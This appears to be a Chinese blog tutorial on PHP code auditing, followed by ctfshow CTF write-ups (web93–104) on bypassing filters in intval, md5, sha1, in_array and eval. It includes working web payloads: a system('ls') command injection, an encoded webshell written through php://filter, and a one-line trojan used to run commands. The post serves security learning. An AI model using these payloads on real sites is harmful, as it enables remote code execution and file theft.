浅谈PHP代码执行中出现过滤限制的绕过执行方法_php过滤绕过-CSDN博客
php代码审计(适合小白入门)_php审计入门-CSDN博客
什么是PHP?
PHP 是一种脚本语言, "PHP Hypertext Preprocessor" 的首字母缩略词 PHP 语法吸收了 C 语言、Java 和 Perl 的特点,利于学习,使用广泛,主要适用于 Web 开发领域。PHP 是一种被广泛使用的开源脚本语言,且PHP 脚本是在服务器上执行的。
PHP的审计方法
1.根据敏感关键字回溯参数传递过程(逆向追踪)
检查敏感函数的参数,进行回溯变量,判断变量是否可控并且没有经过严格的过滤,这是一个逆向追踪的过程。
2.寻找可控参数,正向追踪变量传递过程(正向追踪)
跟踪传递的参数,判断是否存入到敏感函数内或者传递的过程中具有代码逻辑漏洞。
3.寻找敏感功能点,通读功能点代码(直接挖掘功能点漏洞)
根据自身经验判断在该应用中的哪些功能可能出现漏洞。
4.直接通读全文代码
常见的PHP函数
intval()函数
int intval( var,base)
//var指要转换成 integer 的数量值,base指转化所使用的进制
Note:
如果 base 是 0,通过检测 var 的格式来决定使用的进制:
如果字符串包括了 "0x" (或 "0X") 的前缀,使用 16 进制 (hex);否则,
如果字符串以 "0" 开始,使用 8 进制(octal);否则,
将使用 10 进制 (decimal)。
第一种过滤
php
<?php
echo intval(042); // 34
echo intval(0x1A); // 26
?> 此时就可以看出它的一个利用方式了,当过滤某个数字时,我们可以利用它的进制转换来绕过。
第二种过滤
返回值
成功时返回 var 的 integer 值,失败时返回 0。空的 array 返回 0,非空的 array
返回 1。
从返回值可得,如果是一个弱比较a==b我们输入a[]=1和b[]=2,此时这两个是不同的,但还都会返回1,此时也就实现了一种绕过,这是第二种绕过思路。
第三种过滤
php
echo intval(42); // 42
echo intval(4.2); // 4我们可以发现小数点后的数字会直接舍去,所以这可以作为第三种,当过滤4的时候,我们可以输入4.2来绕过
第四种过滤
php
echo intval(1e10); // 1410065408
echo intval('1e10'); // 1这个呢我们发现单引号传值的时候,它只识别字母前面的一部分,当我们进行get传参时,我们其实就是默认加单引号的,所以这又是一种绕过方式。还有说一下这里不是必须是e,这里只要是字母就可以
ctfshow做题 (93-104关)
web93
1.进行代码审计,这题主要看的是intval()函数
php
<?php
include("flag.php"); //通过include函数引入flag.php文件
highlight_file(__FILE__);//highlight_file函数用于将当前PHP文件的内容以高亮形式输出
if(isset($_GET['num'])){
$num = $_GET['num'];
//这段代码首先检查通过GET请求发送的num参数是否存在。如果存在,它将这个参数的值赋给变量$num。
if($num==4476){
die("no no no!");
}
//这里直接检查$num是否等于4476。如果是,脚本将终止并输出"no no no!"。
if(preg_match("/[a-z]/i", $num)){
die("no no no!");
}
//这行代码使用preg_match函数检查$num是否包含任何小写字母,如果找到字母,脚本同样会终止并输出"no no no!"。
if(intval($num,0)==4476){
echo $flag;//intval函数尝试将$num转换为整型,其中第二个参数0表示自动检测输入值的基数(进制)。这允许$num以十六进制、八进制或十进制等形式给出,但都会被转换为十进制整数进行比较,如果转换后的整数值等于4476,则输出$flag变量的值。
}else{
echo intval($num,0);//如果转换后的值不等于4476,则输出转换后的整数值。
}
}
?>知识点
1.php中的"=="弱比较只比较值,不比较类型**(** 两个等号是弱类型比较 ,他会将两边自动转换为同一种类型后再进行比较。)
2.以0x("0X")开头的为十六进制
以0开头的是八进制
方法一 使用小数绕过
小数能够绕过前面的两个if,到intval()这里,自动转换为整数,弱比较之后,得到flag
方法二 使用进制绕过
因为这里八进制不仅能够绕过前面两个if,还能在intval()这里转换成十进制,进而得到flag
web94
1.依旧是代码审计,与上题不同的地方就是多了strpos()这个函数
知识点:
因为if(!strpos($num, "0")),所以传入的参数的第一位不能为0,如果是0,就die
方法一 使用小数绕过
因为strpos函数的特性,所以构造的小数为4476.0
方法二 使用进制绕过
因为strpos函数的特性,所以构造的进制前加上空格或者+,这两个加上并不影响
web95
1.代码审计,这题的代码与94不同的就是preg_match函数这里,多过滤了一个.
2.所以这关只能使用进制来绕过,与上面的一关相同
web96
1.代码审计
php
<?php
highlight_file(__FILE__);
if(isset($_GET['u'])){ //isset($_GET['u']) 检查URL中是否存在名为u的查询参数。
if($_GET['u']=='flag.php'){ //如果u参数存在,代码会进入第一个if语句块。
die("no no no");//通过$_GET['u']=='flag.php'检查u参数的值是否等于flag.php。如果是,执行die("no no no");
}else{
highlight_file($_GET['u']); //如果u参数的值不等于flag.php,则执行else语句块中的highlight_file($_GET['u']);。
}
?>知识点:
/?u=/var/www/html/flag.php 绝对路径((/var/www/html 是Web服务器的默认根文件夹))
/?u=./flag.php 相对路径 ("./"表示当前目录)
/?u=php://filter/resource=flag.php php伪协议
1.这里使用相对路径
web97
1.代码审计
php
<?
include("flag.php"); //这行代码通过include函数包含了当前目录下名为flag.php的文件。
highlight_file(__FILE__);//highlight_file函数用于将指定的文件(这里是当前执行的PHP文件,通过__FILE__魔术常量获取)的内容以语法高亮的形式输出。
if (isset($_POST['a']) and isset($_POST['b'])) { //检查是否用post这个方法传入了a,b
if ($_POST['a'] != $_POST['b']) //两个参数的值是否不相等
if (md5($_POST['a']) === md5($_POST['b'])) //它们的MD5哈希值是否相等
echo $flag;
else
print 'Wrong.';
}
?>知识点
MD5()函数无法处理数组,如果传入的为数组,会返回NULL,所以两个数组经过加密后得到的都是NULL,也就是相等的。
在 php 中,=== 代表着强比较,不仅仅会比较值,还会比较类型。
2.使用数组绕过
web98
1.进行代码审计
知识点
1.&是引用符号,意思是:不同的名字访问同一个变量内容。php的引用是在变量或者函数、对象等前面加上&符号,PHP 的引用允许你用两个变量来指向同一个内容
2._GET?_GET=&$_POST:'flag';意思:如果存在get方式,就把post的地址传给get,相当于get,只不过要利用post传一下参数
3.highlight_file(_GET\['HTTP_FLAG'\]=='flag'?flag:FILE)意思:如果有通过GET方法传参'HTTP_FLAG=flag',就highlight_file($flag)。否则highlight_file(FILE)
2.经过分析可得,get随便传参,post传参HTTP_FLAG=flag
web99
知识点
array函数
array_push函数
in_array函数
注意:
- 这个函数的漏洞点就是如果第三个参数没有被设置或者设置为false时,那么从 haystack 比较 haystack比较 haystack比较needle时,采用的就是弱类型比较。
- 如果第三个参数设置为了true,那么就会同时再检查类型。
1.代码审计
php
<?
highlight_file(__FILE__);
$allow = array(); //创建了一个空数组 $allow,用来存储后续生成的随机数。
for ($i=36; $i < 0x36d; $i++) { //for 循环,从 $i 初始化为 36,逐步增加直到 0x36d(十六进制表示的 877)。
array_push($allow, rand(1,$i)); //在每次循环中,使用 rand(1, $i) 函数生成一个 1 到 $i 之间的随机数(也就是 1~877),并将其添加到 $allow 数组中。
}
if(isset($_GET['n']) && in_array($_GET['n'], $allow)){ //检查是否设置了名为 n 的 GET 参数,并且确保它的值在 $allow 数组中。
file_put_contents($_GET['n'], $_POST['content']); //如果 $_GET['n'] 的值在 $allow 数组中,将 $_POST['content'] 的内容写入文件 $_GET['n'] 中。
}
?> 2.分析代码,就很清晰了,我们需要用POST传参内容到GET传参的文件中,这里我们利用一句话木马来解决,最后在访问该文件,进行命令执行即可。首先,get传参1.php,post写一句话木马
3.然后我们访问这个一句话木马文件,再POST执行系统命令即可获得flag。
web100
考点:
1.考察的是运算符的优先级 :&& > || > = > and > or
数字越大越先执行
2.该函数在此关卡为
$vo = $v1 and FALSE and FAlSE
1.代码审计
php
<?php
highlight_file(__FILE__);
include("ctfshow.php");
//flag in class ctfshow;
$ctfshow = new ctfshow();
$v1=$_GET['v1'];
$v2=$_GET['v2'];
$v3=$_GET['v3'];
$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);//因为=比and优先 所以v0的值是v1赋的 所以v0=is_numeric($v1)
if($v0){//需要满足 if 语句才会进入后面的判断,因此要求 v0 为 1,这里用的是 and,所以只需要满足 v1是数字即可。
if(!preg_match("/\;/", $v2)){
if(preg_match("/\;/", $v3)){//要求 v2 中不能有分号,v3 中需要有分号。
eval("$v2('ctfshow')$v3");//如果上述要求都满足,则会调用 eval 函数。
}
}
}
?> 2.构造?v1=1&v2=system("ls")&v3=;
3.挨个查看,得到flag在ctfshow.php中
- 0x2d代表是16进制的,转化一下就行
0x2d //-
web101
知识点
$class = new ReflectionClass('ctfshow'); // 建立ctfshow这个类的反射类 $instance = class −> newInstanceArgs(class->newInstanceArgs( class−>newInstanceArgs(args); // 相当于实例化ctfshow类
1.代码审计,与100关不一样的地方就在preg_match()函数这里,过滤的内容不一样,特别是 $ 和反引号这些都被毙掉了,我们只能采用反射类的方法:
2.发现最后少了一个不是数字就是字母,直接使用burp抓包爆破即可
web102
ctfshow-web入门-102_ctfshow web102-CSDN博客
知识点:
1.call_user_func --- 把第一个参数作为回调函数调用, 其余参数是回调函数的参数
1.代码审计
php
<?php
highlight_file(__FILE__);
$v1 = $_POST['v1'];
$v2 = $_GET['v2'];
$v3 = $_GET['v3'];
$v4 = is_numeric($v2) and is_numeric($v3);//要求 v2 是数字,这样才会满足 if 条件,进入后面的语句。
if($v4){
$s = substr($v2,2);//从 $v2 的第三个字符开始截取子字符串并赋值给 $s。
$str = call_user_func($v1,$s);//调用 $v1 指定的函数,并将 $s 作为参数传递给该函数,将函数的返回值赋值给 $str。
echo $str;
file_put_contents($v3,$str);//将 $str 写入 $v3 指定的文件中。
}
else{
die('hacker');
}
?> 2.if中需要v4为真才能往下执行,而v4要为真就是v2传的参数要为数字或者数字字符串,同时v2也是我们要写入的webshell,为了让v2为数字或者数字字符串,我们可以先把我们的webshell转换为base64编码,再把base64编码转换为16进制,这是一种办法去转换成数字。
php
$a='<?=`cat *`;'; //为什么用这个,主要是因为编码后带e,或者是编码后全部是数字
$b=base64_encode($a); // PD89YGNhdCAqYDs=
$c=bin2hex($b); //这里直接用去掉=的base64
//输出 5044383959474e6864434171594473
带e会被当做科学计数法,而base64去掉等号,不影响解码
bin2hex把ascii码转为16进制3.构造 get:?v2=005044383959474e6864434171594473&v3=php://filter/write=convert.base64-decode/resource=1.php
post: v1=hex2bin
4.查看php文件,最后查看源代码
web103
1.代码审计,与102相比就是多了preg_match这个函数,过滤掉了一些内容
- 这个过滤并没有什么影响,使用上题的方法进行解题
3.访问php文件,最后看源代码,得到flag
web104
1.代码审计,这里涉及到shal()函数,并且这里使用的是弱比较
知识点:sha1()函数特性,sha1函数无法处理数组,遇到数组会返回NULL
2.构造 get: v2[]=1 post: v1[]=1
